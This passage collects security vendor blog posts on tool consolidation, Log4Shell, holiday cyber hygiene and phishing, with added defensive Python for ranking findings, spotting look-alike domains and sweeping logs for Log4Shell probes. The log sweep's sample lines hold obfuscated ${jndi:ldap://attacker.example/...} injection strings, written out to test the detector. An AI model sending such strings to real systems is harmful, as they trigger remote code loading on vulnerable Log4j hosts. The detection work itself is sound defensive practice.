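        f["tools"] = sorted(f["tools"])
        ranked.append(f)
    ranked.sort(key=lambda f: (-f["score"], f["asset"], f["title"]))
    return ranked


def to_ticket(finding: Dict) -> Dict:
    """Map a ranked finding onto a (hypothetical) ticketing schema with P1..P4 priorities."""
    s = finding["score"]
    priority = "P1" if s >= 15 else "P2" if s >= 8 else "P3" if s >= 4 else "P4"
    return {
        "summary": f'[{priority}] {finding["title"]} on {finding["asset"]}',
        "priority": priority,
        "asset": finding["asset"],
        "sources": finding["tools"],
        "business_score": s,
        "cvss": finding["cvss"],
    }


if __name__ == "__main__":
    for f in prioritise(SAMPLE_FINDINGS):
        t = to_ticket(f)
        print(f'{t["priority"]}  {t["business_score"]:>6}  cvss={t["cvss"]:<4}  {t["summary"]}')
```

Run as-is and the CVSS 9.8 remote code execution on the internal, low-criticality build agent lands at P3, below the CVSS 8.1 authentication bypass on the internet-facing payments host, and the analyst-rejected SQL injection never reaches a ticket. Whatever weights you choose, keep the asset inventory as the source of exposure and criticality; putting that context into the scanner output is what turns a vulnerability list into a ranked risk picture.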
Reason 2 – Adaptive Attack Surface Management

The attack surface evolves. As the business evolves, new systems are deployed, others are decommissioned or changed, firewall rules change, and rogue deployments and API exposures are introduced. A Smart VM solution continuously scans, discovers and assesses all elements of the attack surface, as well as the logical controls associated with each API. Flying blind is not smart. Adaptation is Smart.

Reason 3 – Single Dashboard of Truth

A fragmented view of your security impedes your ability to act decisively on what really matters. The attacker certainly does not care which IT stack layer they leverage to achieve their goals. A Smart approach gives you a complete, single picture of your security posture. It’s not about enumerating vulnerabilities per attack surface layer; it’s about resolving the important issues wherever they occur, right?

Reason 4 – IT and Operations are “Smart” Remediators

By integrating accurate, full-stack, contextualized intelligence AND remediation guidance into the day-to-day workflow of IT and support staff, you effectively make your IT team security remediation all-stars. That’s Smart.

Reason 5 – Your Management Outlook Becomes Strategically “Smart”

Security now has a strategic seat at the enterprise board table. Armed with a single, proactive approach to ensuring the enterprise is resilient, the security team now partners with business teams to proactively ensure the optimal security posture is realized for each new business transformation exercise.

### Five Reasons Why Hackers Do Not Want You to Consolidate Your Security Toolset

While cost reduction and tool management bandwidth concerns might be why you are considering security tool consolidation, the hacker has a different agenda.
They are counting on you NOT to consolidate your security tools; indeed, their success depends heavily on you continuing with tool proliferation, for a lot of reasons. Here are five, from the perspective of the hacker:

Reason 1 – Don’t Bother with Us - Focus on Compiling Reports

It is good to set goals. Imagine how impressive it will be if your team dedicates itself to manually compiling reports from all of your security scanning tools for each layer of the IT stack, and you invest weeks, if not months, ensuring each scanning tool’s siloed results are contextualized against the other siloed results. Imagine how impressed your management will be that you have managed this quarter to cobble together a report smoothing over the fragmented picture of your security posture. And the great news is that you get to do it all again next quarter. That’s the point of your security team, isn’t it: compiling reports across your siloed point scanning tools? We hackers can stay out of sight and out of mind while you accomplish this important task.

Reason 2 – Tool Proliferation Noise is not a Distraction – It’s Your Day Job

We know scanning tools create a lot of noise: false positives. We know that having different scanning tools for every IT layer generates exponentially more noise. But if you want accuracy, then you have to own up to the fact that you are going to spend the bulk of your time ruling out false positives. Sorry, that’s your day job. And sorry if that takes the focus off our creative entrepreneurial activities. If that handicaps you in catching the real vulnerabilities we can exploit, we are OK with that.

Reason 3 – Automated Scanning Tools Spit out Alerts – Interpreting Broken Business Logic is Messy

We are hackers. We are humans. It’s not easy finding ways to hack corporate systems.
We have to think through how a seemingly innocent exposure, say a mothballed application still reachable from the public internet, combined with some creative thinking about how small logical steps chain together, can gain us access to our prize. We do not want you to think about the logic. We want you 100% reliant on scanning tool reports. Even worse, we do not want you to bring in security expertise to anticipate how real attack surface vulnerabilities can be exploited. Focus on acquiring and managing more point scanning tools and enjoy the scale of alert generation; we will focus on breaking the business logic. Leave the messy human interpretation stuff to us.

Reason 4 – All Vulnerabilities are Created Equal

If, through a single full-stack integrated solution, you have access to a “single touchstone of truth”, then that’s not really fair. Your traditional procedure of stacking up all the discovered vulnerabilities from each of your tool-generated alerts, with no regard to their business significance, helps keep it an even playing field. Your attention to vulnerabilities that do not really matter, or better yet are not even actual vulnerabilities, gives us a chance to seize on those small windows of opportunity that really matter. If you consolidate your layered security tools into a single platform that can laser-focus on the vulnerabilities that really matter across the entire attack surface, continuously, then that takes us out of the game. And if you can automate business-ranked vulnerability alerts while ruling out false positives, then you are really taking the fun out of the game. So we say categorically “No”. In the spirit of fairness, keep the disparate tools, keep a generic list of all discovered vulnerabilities, manage them one by one, and leave it to us to find the things that really matter.
Reason 5 – Promptly Closing Vulnerability Tickets with All of Your Tool-Generated Alerts is Not Your Job

It’s enough of a day job to manage the overhead of multiple security tools and to discover the vulnerabilities themselves; surely you cannot be shouldering their resolution as well? That’s IT and Operations’ job. All you have to do is take the vulnerability reports individually from each of your many scanning tools across your IT stack and send them, one by one, to your IT and Operations team. They are perfectly equipped to sleuth through the hundreds, if not thousands, of alerts generated by each tool, discern what requires the most attention, and know exactly how to resolve them, including any broken business logic that could lead to a serious incident. And you can rest assured that the IT and Operational Support team’s primary job is NOT optimizing business processes and technologies to achieve their business goals and resolving their own user IT tickets. No, they live to pore through your heaps of multiple-tool vulnerability reports and figure out how to resolve the things that really matter. And while we wait for the fixes to happen across all of your tool-generated alerts, between you and IT, we are content to creatively leverage those important vulnerabilities that remain unresolved. That lengthy step between vulnerability identification and remediation is what we live for. And if the step gets longer because you are burdened with too many tools, all the better.

In Summary

The hacker is a huge fan of your multiple point solution approach. Tears of happiness were shed when Gartner confirmed that in 2021 “78% of Enterprises have 16 tools or more and 12% have 46 or more.”

Taking a step back and adopting the perspective of the hacker makes it more obvious that burdening your vulnerability management team (and your IT team) with a plethora of security tools gives the hacker unnecessary advantages in advancing their efforts.
And yet Gartner tells us that enterprises today simply have too many tools. The good news is that there are solutions and approaches that make security tool consolidation, and all its inherent benefits, available today.

### Edgescan Announces Partnership With Manicode

Edgescan Announces Partnership With Manicode To Deliver Problem-Based, Interactive, and Customizable Secure Coding Courses

DUBLIN (03 Feb 2022) - Edgescan, the provider of the most comprehensive full-stack vulnerability management solution, today announces a partnership with Manicode Security, the secure coding education company. With a combination of lecture, security testing demonstration, and code review, Manicode classes are sure to entertain and educate app, web services, and mobile software developers and architects in the practices of secure development. Jim Manico is not your average trainer, nor is anyone in his team of highly qualified instructors. With lessons delivered by Michelin-starred chefs with a PhD in computer science, to talks that start with a headstand on stage, Manicode Security aims to make secure development training something that leaves the class energized and motivated. Their philosophy is that learning secure coding shouldn’t be a yawn-inducing, box-ticking exercise, but something that is memorable, engaging, and motivating.

“I have followed Edgescan for years, and I’ve seen their technology mature”, said Jim Manico, founder of Manicode Security. “Their philosophy is in line with what I teach: it’s a no-nonsense approach, focused on delivering operational value and tangible results.
I’m excited about this partnership and I look forward to seeing how their presence will grow in North America, as more and more organizations recognize the value of teaching the practices of secure coding and of embedding security into their processes.”

“I’m glad to be back partnering with Jim; he’s a force of nature and an authority on all things software security,” said Eoin Keary, CEO and co-founder of Edgescan. “Security starts with education and should be integrated into coding practices, rather than an afterthought. The Edgescan platform combined with Manicode will deliver problem-based, focused security education based on the challenges faced by our clients. With Manicode we hope to continue to spread awareness and advocate for a culture of security across the board”.

About Manicode

At Manicode Security, 100% of the focus is on teaching developers to write secure code. We bring a combination of passion, style, and decades of research into all of our education offerings. Jim Manico is the founder of Manicode Security, where he trains software developers on secure coding and security engineering. He is also an investor/advisor for Nucleus Security, 10Security, BitDiscovery, KSOC and Inspectiv. Jim is a frequent speaker on secure software practices, is a member of the Java Champion community, and is the author of "Iron-Clad Java: Building Secure Web Applications" from Oracle Press. Jim also volunteers for the OWASP Foundation as the project lead for the OWASP Application Security Verification Standard and the OWASP Cheat Sheet Series.

About Edgescan

Edgescan is an award-winning full-stack Attack Surface Management & Vulnerability Management Security as a Service (SaaS) solution.
Edgescan™ protects & manages thousands of assets across the globe for both Fortune 500 and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses in Internet-facing systems such as web applications, APIs, network/device systems and IoT services. Because analysts validate every discovered vulnerability, the solution is highly accurate and virtually false positive free.

### January 2022 Vulnerability Statistics Snapshot

This year we are introducing a new way to keep the infosec community up to date on the latest vulnerabilities and the CVEs associated with them. We break the figures down by Network/Device and Application/API, with the percentage of each vulnerability class we discovered during the month through the Edgescan platform. Follow the link below for more information on the statistics found in January 2022 through the Edgescan platform. If you want to learn more about the current vulnerability landscape, Edgescan is hosting a webinar on the 18th of February with Eoin Keary and Jim Manico, who will sit down and look through the preview of the 2022 Vulnerability Statistics Report and what we can expect 2022 to bring.

### Five Reasons You Need to Consolidate Your Security Toolset Now

You know you have too many security tools and you are on the edge of making a dedicated effort to consolidate now. Here are five big reasons to push you over the edge:

Reason 1 – Cost

The easy argument: there are many ways to reduce cost significantly, including 1) tiered volume discounts and favourable terms with a single supplier, 2) lower vendor management costs with fewer suppliers and contracts, 3) less operational overhead and maintenance cost managing fewer tools, 4) lower support costs managing software updates across multiple tools, and 5) lower internal legal and procurement administrative costs managing multiple licenses and renewals.
Yes, cost reduction is straightforward, but it is not the most important reason.

Reason 2 – Operational Overhead

The typical vulnerability management team has to spend considerable time and effort compiling alerts across all layers of the IT stack. A Smart integrated full-stack solution offers consolidated, business-ranked alerting across the entire attack surface, built into the platform. Your team spends less time compiling and validating and more time resolving issues.

Reason 3 – Remediation Efficiency

Compiling alerts across the stack from single-point solutions not only robs you of precious operational bandwidth; it takes time, because it is an extra step in the workflow. With alerts based on full-stack assessments integrated into IT’s daily operational support system, tickets get resolved quicker. It’s not about how many vulnerabilities you discover; it’s about how many you close, right?

Reason 4 – Security Staff Morale

You most likely already have a recruiting challenge staffing your security team. Why increase the attrition rate and lower staff morale by layering tool proliferation management on top of the real security job, stopping attacks?

Reason 5 – Increased Resilience

You might have started vendor tool consolidation for traditional cost-cutting reasons, but the real kicker, and the crown jewel of security vendor consolidation, is improved security posture. “Having fewer security solutions can make it easier to properly configure them and respond to alerts, improving your security risk posture.” (Gartner 2020 CISO Effectiveness Survey)

Strengthening Vulnerability Management with NVM

With Network Vulnerability Management (NVM), we help you consolidate your security tools into one streamlined solution, making vulnerability management more efficient. Our service simplifies monitoring and addressing vulnerabilities across your network, ensuring that your security posture remains robust.
With operations in Dublin and New York, we provide a unified approach to security.

### Five Easy Steps to Achieving Security Tool Consolidation Now

Your Tool Proliferation Problem is Both Serious and Fixable

Step 1 – Recognize it is a Problem

You are not alone. Gartner has concluded that in 2021, 78% of enterprises had 16 tools or more and 12% had 46 or more, and the majority of them (80%) have identified vendor consolidation as a top-three initiative. It’s a problem. It’s a serious problem. It’s a problem you need to solve now. (Gartner Top Security and Risk Trends for 2021)

Step 2 – Break the Habits that Brought You Here

As the Gartner report suggests, it’s not unusual to find yourself plagued with a tool proliferation problem. You, and the majority of enterprises, have simply followed the path of acquiring specialized tools for each layer of the IT stack. Now you need to declutter and pivot away from a pure point-solution approach.

Step 3 – Ensure Everyone Appreciates the Value of Consolidation (and it’s not just cost reduction)

Usually there are compromises to be reached; one typically expects that tool consolidation sacrifices the accuracy of best-of-breed point solutions. The opposite is in fact the case. Gartner concludes that while cost reduction might initially be the driver, consolidation actually delivers both streamlined operations and lower security risk.

Step 4 – Start with the Low-Hanging Fruit: Embrace Smart Full-Stack Platforms

This is more than wishful thinking: mature solutions exist that have been purpose-built from the ground up within a full-stack paradigm. Edgescan is one such solution. Its full-stack solution integrates expert verification with tuned scanning engines for the web application layer, the hosting environment layer, the host operating system, host services and the underlying network.
These are all modular, so you can consolidate strategically, starting with the layers that matter most to you.

Step 5 – What is a Reasonable Expectation?

Of course every client’s starting complexity is different, but on average a CISO can conservatively eliminate 25% of tools. For those with 46 tools that translates to ten to twelve tools eliminated. This is significant, and can be realized within weeks of implementation.

### Log4Shell Quick Script

Anyone wishing to do a quick test to see whether Log4Shell vulnerabilities are present on your systems? James Mullen has devised a handy little script to quickly test whether the vulnerability is present on any of your systems. You can get more information from our GitHub below:

https://github.com/BCCRiskAdvisory/log4shell-poc-py

### Log4Shell Introduction

It is rare that a vulnerability lives up to the hype, but CVE-2021-44228, aka Log4Shell, has exceeded expectations. This vulnerability allows unauthenticated remote code execution (RCE). It is triggered when attacker-controlled input containing a JNDI lookup string (of the form ${jndi:ldap://...}) is logged by a vulnerable Log4j 2 logging component (versions 2.0-beta9 through 2.14.1), which resolves the lookup and can load a class from an attacker-controlled server. Because any value that ends up in a log line can carry the string (a User-Agent header, a form field, a username), the system that logs it may be several hops behind the internet-facing one.

What we are doing

If we discover this vulnerability in your environment, we will contact you directly. We have effective methods of discovering this vulnerability and we are running scans against all customer environments. These scans are additive and run continuously, in parallel with your normal scanning, and the detection methods are updated hourly.

How we are doing it

Edgescan is treating this with every client as the highest priority. Our scans will continue to run with the following approach. First, a base request with the latest research and vectors. Then an unscheduled scan after crawling the application for endpoints and parameters, which are tested to ensure full coverage of any logging that may take place deep within the application.
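The scanning approach described here probes for the vulnerability from the outside. The defender-side complement is to check your own request logs for the JNDI lookup strings that were sent at you, including the obfuscated variants (nested ${lower:…}, ${::-…} default-value tricks and URL-encoded forms) that defeat a naive search for the word jndi. The detector below is an added example written for this page; it is not the Edgescan script linked above nor Edgescan's scanner. The access-log lines are constructed, and the code statically evaluates only the handful of Log4j 2 lookups commonly used to hide the prefix (lower, upper, a quoted date literal, and the :- default syntax); anything else is left unresolved.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# A lookup with no nested lookup inside it, e.g. ${lower:j} or ${::-n}.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Log4j 2 lower-cases the lookup prefix, so ${JNDI:...} resolves just like ${jndi:...}.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Statically evaluate one innermost lookup the way Log4j 2 would, for the
    lookups attackers use to hide the word 'jndi'. Returns None when the lookup
    cannot be evaluated offline (e.g. ${java:version} or ${ctx:loginId})."""
    if ":-" in body:
        # Default-value syntax: ${sys:nope:-j}, ${env:NOPE:-j} and the bare ${::-j}
        # all evaluate to the text after ':-' when the variable is unset.
        return body.split(":-", 1)[1]
    prefix, _, arg = body.partition(":")
    key = prefix.strip().lower()
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if key == "date":
        # ${date:'j'}: a quoted literal inside the date pattern is emitted verbatim.
        m = re.fullmatch(r"'([^']*)'", arg)
        if m:
            return m.group(1)
    return None


def normalize_lookups(text: str, max_rounds: int = 16) -> str:
    """Undo one layer of URL encoding, then repeatedly collapse innermost lookups
    until a ${jndi: prefix surfaces or nothing more can be resolved."""
    s = unquote(text)
    for _ in range(max_rounds):
        if JNDI_LOOKUP.search(s):
            return s
        changed = False

        def repl(m) -> str:
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)   # leave unknown lookups untouched
            changed = True
            return r

        s = INNER_LOOKUP.sub(repl, s)
        if not changed:
            break
    return s


def is_log4shell_probe(text: str) -> bool:
    """True if the text, once de-obfuscated, contains a JNDI lookup."""
    return JNDI_LOOKUP.search(normalize_lookups(text)) is not None


def scan_log(lines) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        if JNDI_LOOKUP.search(norm):
            hits.append((n, norm))
    return hits


# Constructed access-log lines: one benign, four probes of increasing obfuscation, one benign lookup.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.example/a}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "-" "${java:version} health-check"',
]

if __name__ == "__main__":
    for n, norm in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {norm}")
```

A hit tells you a probe was received, not that the receiving system was vulnerable; pair the log sweep with an inventory of Log4j 2 versions (and of the hosts your logs are forwarded to) before you close the question. The normalizer also deliberately stops when it meets a lookup it cannot evaluate, so an unexpected unresolved ${...} in a line is itself worth a look.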
If a server is found to be vulnerable at this phase, our client is contacted to ensure both prompt notification and that mitigation is in place. We follow this up by fuzzing the discovered endpoints and parameters with the latest bypass vectors. After the third phase is completed, we continue to discover and confirm full coverage, as well as staying on top of both research and feeds for any additional mitigation bypasses.

Contact

If the testing team discovers a vulnerable instance in a customer’s organisation, we contact the customer directly. If you hear nothing, great: scans are happening and we haven’t discovered a vulnerable instance yet.

API Security for Modern Threats

The Log4Shell vulnerability reminded us of the risks lurking in APIs. Our API Security Testing service identifies and secures your API endpoints to prevent data breaches. With offices in Dublin and New York, we help you maintain secure integrations across your ecosystem.

### Edgescan’s Christmas Shopping Security Checklist

Christmas is a busy time of year for everyone: running around buying presents, finishing end-of-year work tasks before a well-deserved break, and travelling around to meet up with loved ones for the festive period. While filled with joy and cheer, Christmas can be overwhelming, and it is easy to forget important tasks when you’re run off your feet.

The holiday period is also renowned for spikes in cybercrime. Cybercriminals follow the money trail of online gift shopping and take advantage of people caught off guard as they relax over the holidays. After all, it’s easy to forget about being cyber secure while tucking into a Christmas roast.

But this is where lists really shine as the true stars of Christmas. Not only do they help you remember gifts and last-minute errands before the big day, they can also protect you from any pesky cybercriminals working their way onto the naughty list and into your digital universe.
This year the Edgescan team have put together the ultimate cybersecurity checklist so you can avoid any security stress this winter and protect yourself against Christmas cybercrime:

Write an inventory of all your smart devices

A good first step is writing an inventory of all your smart devices. Devices that are constantly connected to the internet increase the risk of a security compromise. Writing them down makes you aware of what you have, how each one could give an attacker a way in, and how you can protect it.

Don’t use default passcodes to protect devices

If you have a password-protected device, make sure you change the default PINs or passcodes it came with. The default passwords printed in the device manual are in the same manual the attackers have access to. This is especially important to remember when receiving devices as gifts during the festive period.

Disconnect non-essential smart devices

Once you have made your inventory, check which of these devices actually need to be connected to the internet and which don’t need their connected functionality. For the devices that remain connected, update them manually or define a window in which the device can access the internet and apply necessary updates.

Don’t forget your router

Home routers are easy to forget about and are often left running outdated firmware. It is always good practice to make sure your router is fully updated, so see this as your sign to set regular reminders to run router updates.

Be wary of purchasing cheap connected devices online

It is especially important during the gifting period to be cautious about buying cheap connected devices online. It’s tempting to nab a good deal, but a device may only be discounted because the manufacturer has compromised on the product’s security.
When you see a good deal on a connected device, do your due diligence and find out whether it is from a reputable manufacturer.

Add non-sensitive smart devices to a ‘guest’ network

If there are devices that don’t hold sensitive data (e.g. a coffee machine or fridge), you can connect them to a separate network. By putting these devices on what is essentially a ‘guest’ network, you can still use them while separating them from more sensitive devices such as laptops, adding an extra layer of security.

Protect your privacy

To protect your data while browsing for gifts this year, use a private browser window for ‘anonymous’ browsing. A private window discards its cookies and history when it is closed, but it does not hide your traffic from the website, your ISP or the network you are on, so treat it as local tidiness rather than anonymity. When using a private window, don’t sign into any websites and close it periodically.

Be aware of your device’s life cycle

Being aware of your device’s life cycle means you also know when it needs patch updates, whether you can still use the product if the manufacturer ceases to exist, and whether support is available if your device goes wrong.

Happy holidays, and stay safe!

Secure Your Holiday Shopping with DAST

At Edgescan, we understand how critical it is to secure online transactions during the holiday shopping rush. Our Dynamic Application Security Testing (DAST) ensures that your e-commerce applications are protected against vulnerabilities, keeping your customers’ data safe. With offices in Dublin and New York, we provide global support to keep businesses secure during this peak shopping period.

### The ROI Dilemma in Cybersecurity

The return on investment (ROI) of cybersecurity tools is notoriously hard to calculate. It’s a critical way to assess whether an investment is worth its price tag, but calculating how much a cybersecurity solution might save an organisation is a complicated matter.
Some calculate cybersecurity ROI by multiplying the average cost of a security incident by the number of cyberattacks that, statistically, would hit an organisation in a given time frame. Although this can give the board an idea of how much a certain cybersecurity solution might save the business, it remains an approximate calculation which might not fully reflect the value of an investment in security tools.

Edgescan strives to give its customers the best value for their investment, and that includes being able to prove that the Edgescan full stack vulnerability platform saves them money and time. To help customers visualise the ROI, the Edgescan platform provides metrics that assess how many employee hours are saved by automating vulnerability management across the full stack.

But there are many more returns on investment that don’t necessarily translate into a number. Some of the operational advantages that a cybersecurity solution brings to an organisation are harder to quantify, but ultimately make a huge difference when it comes to streamlining security and avoiding a breach.

#### Mean time to remediate (MTTR)

The average time it takes organisations to patch a high risk network vulnerability is around 49 days. This number is consistent across small and large enterprises. The Edgescan platform tracks the MTTR of its clients and compares it to the average. This gives organisations a benchmark to compare their performance against, so that security teams can track how their patching policies have improved.

#### Creating a channel of communication between teams

One of the main challenges facing security teams is communicating with IT, DevOps, and the rest of the organisation. Too often, cybersecurity operations use a language that only makes sense to security analysts, which makes it harder for teams to work together.
It’s important for cybersecurity tools to simplify the interactions between teams, to promote collaboration and to ensure that cybersecurity objectives are shared by the organisation as a whole. For this reason, Edgescan has worked to make its platform as intuitive as it can be. Reporting, in particular, has been designed to be automated, seamless and, most importantly, understandable.

#### Time saved

At the end of the year, Edgescan provides its clients with an assessment of how many hours of their employees’ time the platform has saved. By automating the discovery and assessment of vulnerabilities, security analysts are free to turn their attention to other matters, ultimately saving the business money. Additionally, by manually validating every vulnerability, Edgescan provides alerts that are virtually free of false positives, avoiding false alarms that would waste personnel time.

#### Peace of mind

Cybersecurity vendors can sometimes be hard to get hold of. Especially with large vendors, the feedback of each individual client is rarely taken into account, and speaking with a human might require going through several steps of automated calls. Edgescan has made it a point to maintain the same hands-on approach with its clients as it had when we first started. We might have gotten bigger, but responding to clients’ queries and listening to what they have to say helps us improve and keep in touch with evolving security needs.

The average cost of a cyberattack easily surpasses the $1m mark, and avoiding falling victim to one is critical. At the same time, when looking for a cybersecurity tool, don’t just focus on the price tag: ask what other benefits a solution could bring to your business. It’s essential for organisations to start seeing security as an opportunity to add operational value, rather than a necessary spend that is hard to justify.

#### Maximizing ROI with NVM

At Edgescan, we help you maximize the ROI of your cybersecurity investments.
Our Network Vulnerability Management (NVM) service delivers continuous monitoring and prioritization of risks, ensuring your resources are focused on what matters most. From Dublin to New York, we provide tailored solutions to optimize your security strategy.

### How to become a cybersecurity expert

To become a doctor we need a medical degree; to become a lawyer we need to study law. But what about becoming a cybersecurity expert? IT security is a relatively new sector and, despite the technical nature of the job, it welcomes people from all walks of life and with all sorts of academic and professional backgrounds. All it takes is passion, determination, and a lot of common sense.

Edgescan’s very own Dearbhail Kirwan has outlined the key steps needed to become a cybersecurity expert and explains why there is no right or wrong route into this wonderfully fulfilling profession.

#### Don’t expect to know everything, but build a solid knowledge of the basics

Theoretically, an expert should know about every technology, how to protect it, and how it can be abused or broken. This is an unrealistic expectation; instead, the ability to combine existing knowledge with new information is what defines an expert. Learning the fundamentals and taking an interest in staying up to date with industry trends is a great place to start, and a strong understanding of the underlying concepts will certainly help when dealing with a new technology.

#### Remain hungry for knowledge

Much like a doctor needs to attend conferences and learn about advances in their field, cybersecurity experts need to stay on top of new technologies and continuously update their knowledge of attackers’ tactics. Learning is part of the job, and a proactive and interested approach will serve you well in this respect.

#### Don’t rush it

Exposure and practice in a variety of areas will help you figure out which area of cybersecurity interests you the most.
From the outside, cybersecurity looks homogeneous, but the roles within an IT security function vary dramatically. Some things can’t be learnt from books, which is why experience can be extremely valuable in helping you gain skills and choose a speciality.

#### Training and certifications

There is a wide array of cybersecurity certifications available, which can set you apart in many circumstances. The best certifications to get change over time and differ depending on each individual’s interests and goals. Research the areas you want to work in and which certifications are most valued for that area. If you do not have a specific area you are interested in, or do not have any existing relevant qualifications such as a degree, start with a general entry-level cybersecurity certification.

We hope this guide helped you get an idea of what it takes to become a cybersecurity expert. The most important quality to have, however, remains common sense. Cybersecurity has to do with software vulnerabilities, logs, alerts and sophisticated pieces of malware, but more than anything else it has to do with people. It’s important to have the underlying knowledge of the technology to protect, but it’s equally important to know how to communicate effectively and to be able to prioritise what needs to be addressed first. And, when in doubt, just ask! Cybersecurity is a welcoming industry made up of great people who will be more than happy to provide guidance throughout your journey to become an expert.

By Dearbhail Kirwan, Information Security Consultant at Edgescan

#### Step into Cybersecurity with PTaaS

We believe hands-on experience is key to mastering cybersecurity. That’s why our Penetration Testing as a Service (PTaaS) gives you the tools and insights to uncover vulnerabilities and learn real-world security practices. With locations in Dublin and New York, we support aspiring cybersecurity professionals globally.
### The oldest trick in the book still works: why phishing is here to stay

Phishing might be one of the first forms of cybercrime that ever appeared. Some of the scams that were circulating in the early days of the internet have even entered popular culture. Does everyone remember the story of the prince from far away who needed a bit of money, just to tide him over until he’d finally be granted access to his trust fund?

With time, users became savvier, but fraudsters’ tricks became more sophisticated. From spear-phishing to BEC scams, attackers have learnt that by doing some research and spending a little more time crafting their messages, they can use malicious emails, which are convenient and inexpensive, to make their way into organisations’ networks and either scam them for large sums or gain a beachhead from which to launch an attack.

As part of cybersecurity month, Edgescan has compiled a list of today’s most common phishing techniques, with some advice on how to avoid falling for cybercriminals’ tricks. Spoiler alert: user education features prominently!

#### Scam emails

This type of phishing scam is the least sophisticated. It’s generally not very targeted, with the same message going out to a list of contacts (usually email addresses that have been exposed as part of a data breach), so a good way to spot one is to look for generic salutations. As part of this type of scam, fraudsters impersonate a known brand that the recipient is likely to have a connection with. Amazon and Microsoft are all-time favourites, and so are tax collection agencies and other institutions most people will recognise. The email body will contain a call to action, such as clicking on a link to redeem a prize or to rectify a problem with an account. The link then takes the victim to a malicious domain designed to steal the user’s data.
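The URL check in the tips that follow (a fraudster’s `www.hrnrc.co.uk` standing in for HMRC, with `rn` passing for `m`) can be automated on the defender’s side for mail-gateway or SOC triage. The Python below is an added example, not Edgescan’s code; the allow-list of legitimate domains, the tiny public-suffix list and the sample hosts are constructed for illustration.

```python
"""Look-alike domain check for URLs found in suspicious mail.

Added example, not Edgescan's code. KNOWN_DOMAINS, PUBLIC_SUFFIXES and the
sample hosts are constructed for illustration; a real deployment would load
the organisation's own list of legitimate domains and the full Public Suffix
List.
"""
import unicodedata

# Domains we treat as legitimate (constructed allow-list).
KNOWN_DOMAINS = ("amazon.co.uk", "edgescan.com", "hmrc.gov.uk", "microsoft.com")

# Deliberately tiny public-suffix list so the brand label can be isolated.
PUBLIC_SUFFIXES = ("co.uk", "gov.uk", "org.uk", "com", "net", "org", "ie")

# Character sequences that read like one letter in many fonts ("rn" -> "m").
CONFUSABLE_SEQUENCES = (("rn", "m"), ("vv", "w"), ("cl", "d"))

# Single characters easily mistaken for a letter, plus a few Cyrillic letters
# that are visually identical to their Latin counterparts.
CONFUSABLE_CHARS = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
})


def skeleton(label):
    """Canonical form of a label in which look-alike spellings collide."""
    label = unicodedata.normalize("NFKC", label).lower()
    for seq, single in CONFUSABLE_SEQUENCES:
        label = label.replace(seq, single)
    return label.translate(CONFUSABLE_CHARS)


def brand_label(host):
    """The registrable label of a host: 'www.hrnrc.co.uk' -> 'hrnrc'.

    Only the label directly under the public suffix is examined; subdomains
    to the left of it are ignored here.
    """
    host = host.lower().strip(".")
    for suffix in sorted(PUBLIC_SUFFIXES, key=len, reverse=True):
        if host.endswith("." + suffix):
            return host[: -len(suffix) - 1].split(".")[-1]
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else host


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host):
    """Return (verdict, matched_known_domain) where verdict is one of
    'legitimate', 'lookalike', 'typosquat', 'brand_embedded' or 'unknown'."""
    host = host.lower().strip(".")
    for known in KNOWN_DOMAINS:
        if host == known or host.endswith("." + known):
            return "legitimate", known
    sk = skeleton(brand_label(host))
    known_sks = [(known, skeleton(brand_label(known))) for known in KNOWN_DOMAINS]
    # 1. Same skeleton as a known brand, but not the known domain: homoglyph.
    for known, known_sk in known_sks:
        if sk == known_sk:
            return "lookalike", known
    # 2. One edit away from a (long enough) known brand label: typosquat.
    for known, known_sk in known_sks:
        if len(known_sk) >= 5 and edit_distance(sk, known_sk) == 1:
            return "typosquat", known
    # 3. Known brand buried inside a longer label ("micros0ft-support").
    for known, known_sk in known_sks:
        if len(known_sk) >= 5 and known_sk in sk:
            return "brand_embedded", known
    return "unknown", None


if __name__ == "__main__":
    for sample in ("www.hrnrc.co.uk", "hmrc.gov.uk", "arnazon.co.uk",
                   "microsft.com", "micros0ft-support.com", "example.org"):
        print(sample, "->", classify(sample))
```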
Tips: a language of urgency is always a red flag, and so are grammatical errors. Whenever in doubt, taking a little more time to validate that the sender is who they purport to be is always worth it: hover over a link to see whether the URL points to a webpage that looks real, and if in doubt type the address manually into the address bar. It’s important to inspect URLs carefully, as attackers often use homoglyphs. For example, a fraudster impersonating the UK’s HMRC might create domains like www.hrnrc.co.uk, where the “m” is substituted by the similar-looking “rn”.

#### Spear phishing

Spear phishing is much more targeted, as it requires scammers to do some background research on their potential victims. These malicious emails are crafted to deceive a specific person, so they contain a lot more personal information, such as their name, place of employment, job title, and more. Spear phishing is more common when attackers are aiming at an organisation and are looking for a foothold into the network.

